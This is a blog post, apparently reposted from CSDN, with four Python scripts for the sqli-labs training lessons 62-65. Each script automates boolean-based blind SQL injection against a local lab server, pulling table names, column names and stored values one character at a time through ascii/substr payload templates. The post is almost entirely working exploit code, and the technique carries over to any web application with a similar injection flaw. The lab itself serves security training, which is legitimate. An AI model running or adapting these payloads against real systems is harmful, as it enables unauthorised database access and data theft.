

sqli-labs(Less62-65)布尔类型脚本

2022-02-06 21:01:02  阅读:233  来源: 互联网

标签:Less62 col labs sqli print sel tb payload times



前言

运行前需要先下载 requests 和 lxml 包,修改 url 和 referer 的参数值,将 index.php 中的 $times 改为 13000,并重置一下 challenges 数据库。

Less-62

import requests
from lxml import etree

"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload, *params):
    """Recover one string from the lab database, one character at a time.

    `payload` is one of the module-level templates and `params` are its
    leading format arguments (schema / table / column names). For each
    position the function sends one request per candidate in `list_range`
    and keeps the first candidate whose response carries the lab's "true"
    marker, a <font color='#00FFFF'> element. Extraction stops at the first
    position where no candidate matches, so any character outside
    `list_range` truncates the result.

    Every recovered character costs up to len(list_range) near-identical GET
    requests to the same path; that burst is the traffic signature a WAF or
    log-based rule keys on when flagging blind-injection probing.

    Side effect: increments the global `request_times` once per request.
    Returns the recovered string (possibly empty).
    """
    global request_times
    recovered = ""
    position = 1
    while True:
        matched = None
        for code in list_range:
            # group_concat folds every name into a single row, so walking one
            # string covers all of them.
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            marker = document.xpath("//font[@color='#00FFFF']/text()")
            if marker:
                matched = chr(code)
                break
        # No candidate hit at this position: treat it as end of string.
        if matched is None:
            return recovered
        recovered += matched
        position += 1


def main():
    """Walk the lab's `challenges` schema and print what was recovered.

    Order: table names, then the columns of that table, then the values of
    the third column; finally the total request count kept by `same`.
    """
    sel_db = 'challenges'
    divider = '-' * 100

    # The comma-joined table list is reused verbatim as the table name, so
    # this only works when group_concat returned exactly one table.
    sel_tb = same(alltb_payload, sel_db)
    print("{}库里的表:{}".format(sel_db, sel_tb))
    print(divider)

    all_col = same(allcol_payload, sel_db, sel_tb)
    print("{}表里的字段:{}".format(sel_tb, all_col))
    print(divider)

    # Third entry of the comma-separated column list; raises IndexError when
    # fewer than three columns came back.
    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print("{}的值:{}".format(sel_col, all_values))
    print(divider)

    print("一共请求了{}次".format(request_times))



if __name__ == '__main__':
    # Entry point: only runs when the script is executed directly.
    main()

Less-63

import requests
from lxml import etree

"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload, *params):
    """Recover one string from the lab database, one character at a time.

    `payload` is one of the module-level templates and `params` are its
    leading format arguments (schema / table / column names). For each
    position the function sends one request per candidate in `list_range`
    and keeps the first candidate whose response carries the lab's "true"
    marker, a <font color='#00FFFF'> element. Extraction stops at the first
    position where no candidate matches, so any character outside
    `list_range` truncates the result.

    Every recovered character costs up to len(list_range) near-identical GET
    requests to the same path; that burst is the traffic signature a WAF or
    log-based rule keys on when flagging blind-injection probing.

    Side effect: increments the global `request_times` once per request.
    Returns the recovered string (possibly empty).
    """
    global request_times
    recovered = ""
    position = 1
    while True:
        matched = None
        for code in list_range:
            # group_concat folds every name into a single row, so walking one
            # string covers all of them.
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            marker = document.xpath("//font[@color='#00FFFF']/text()")
            if marker:
                matched = chr(code)
                break
        # No candidate hit at this position: treat it as end of string.
        if matched is None:
            return recovered
        recovered += matched
        position += 1


def main():
    """Walk the lab's `challenges` schema and print what was recovered.

    Order: table names, then the columns of that table, then the values of
    the third column; finally the total request count kept by `same`.
    """
    sel_db = 'challenges'
    divider = '-' * 100

    # The comma-joined table list is reused verbatim as the table name, so
    # this only works when group_concat returned exactly one table.
    sel_tb = same(alltb_payload, sel_db)
    print("{}库里的表:{}".format(sel_db, sel_tb))
    print(divider)

    all_col = same(allcol_payload, sel_db, sel_tb)
    print("{}表里的字段:{}".format(sel_tb, all_col))
    print(divider)

    # Third entry of the comma-separated column list; raises IndexError when
    # fewer than three columns came back.
    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print("{}的值:{}".format(sel_col, all_values))
    print(divider)

    print("一共请求了{}次".format(request_times))



if __name__ == '__main__':
    # Entry point: only runs when the script is executed directly.
    main()

Less-64

import requests
from lxml import etree

"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload, *params):
    """Recover one string from the lab database, one character at a time.

    `payload` is one of the module-level templates and `params` are its
    leading format arguments (schema / table / column names). For each
    position the function sends one request per candidate in `list_range`
    and keeps the first candidate whose response carries the lab's "true"
    marker, a <font color='#00FFFF'> element. Extraction stops at the first
    position where no candidate matches, so any character outside
    `list_range` truncates the result.

    Every recovered character costs up to len(list_range) near-identical GET
    requests to the same path; that burst is the traffic signature a WAF or
    log-based rule keys on when flagging blind-injection probing.

    Side effect: increments the global `request_times` once per request.
    Returns the recovered string (possibly empty).
    """
    global request_times
    recovered = ""
    position = 1
    while True:
        matched = None
        for code in list_range:
            # group_concat folds every name into a single row, so walking one
            # string covers all of them.
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            marker = document.xpath("//font[@color='#00FFFF']/text()")
            if marker:
                matched = chr(code)
                break
        # No candidate hit at this position: treat it as end of string.
        if matched is None:
            return recovered
        recovered += matched
        position += 1


def main():
    """Walk the lab's `challenges` schema and print what was recovered.

    Order: table names, then the columns of that table, then the values of
    the third column; finally the total request count kept by `same`.
    """
    sel_db = 'challenges'
    divider = '-' * 100

    # The comma-joined table list is reused verbatim as the table name, so
    # this only works when group_concat returned exactly one table.
    sel_tb = same(alltb_payload, sel_db)
    print("{}库里的表:{}".format(sel_db, sel_tb))
    print(divider)

    all_col = same(allcol_payload, sel_db, sel_tb)
    print("{}表里的字段:{}".format(sel_tb, all_col))
    print(divider)

    # Third entry of the comma-separated column list; raises IndexError when
    # fewer than three columns came back.
    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print("{}的值:{}".format(sel_col, all_values))
    print(divider)

    print("一共请求了{}次".format(request_times))



if __name__ == '__main__':
    # Entry point: only runs when the script is executed directly.
    main()

Less-65

import requests
from lxml import etree

"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload, *params):
    """Recover one string from the lab database, one character at a time.

    `payload` is one of the module-level templates and `params` are its
    leading format arguments (schema / table / column names). For each
    position the function sends one request per candidate in `list_range`
    and keeps the first candidate whose response carries the lab's "true"
    marker, a <font color='#00FFFF'> element. Extraction stops at the first
    position where no candidate matches, so any character outside
    `list_range` truncates the result.

    Every recovered character costs up to len(list_range) near-identical GET
    requests to the same path; that burst is the traffic signature a WAF or
    log-based rule keys on when flagging blind-injection probing.

    Side effect: increments the global `request_times` once per request.
    Returns the recovered string (possibly empty).
    """
    global request_times
    recovered = ""
    position = 1
    while True:
        matched = None
        for code in list_range:
            # group_concat folds every name into a single row, so walking one
            # string covers all of them.
            query = payload_key + payload.format(*params, position, code)
            response = requests.get(url + query, headers=headers)
            request_times += 1
            document = etree.HTML(response.text)
            marker = document.xpath("//font[@color='#00FFFF']/text()")
            if marker:
                matched = chr(code)
                break
        # No candidate hit at this position: treat it as end of string.
        if matched is None:
            return recovered
        recovered += matched
        position += 1


def main():
    """Walk the lab's `challenges` schema and print what was recovered.

    Order: table names, then the columns of that table, then the values of
    the third column; finally the total request count kept by `same`.
    """
    sel_db = 'challenges'
    divider = '-' * 100

    # The comma-joined table list is reused verbatim as the table name, so
    # this only works when group_concat returned exactly one table.
    sel_tb = same(alltb_payload, sel_db)
    print("{}库里的表:{}".format(sel_db, sel_tb))
    print(divider)

    all_col = same(allcol_payload, sel_db, sel_tb)
    print("{}表里的字段:{}".format(sel_tb, all_col))
    print(divider)

    # Third entry of the comma-separated column list; raises IndexError when
    # fewer than three columns came back.
    sel_col = all_col.split(',')[2]
    all_values = same(allvalue_payload, sel_col, sel_db, sel_tb)
    print("{}的值:{}".format(sel_col, all_values))
    print(divider)

    print("一共请求了{}次".format(request_times))



if __name__ == '__main__':
    # Entry point: only runs when the script is executed directly.
    main()

来源: https://blog.csdn.net/weixin_43623271/article/details/122801470
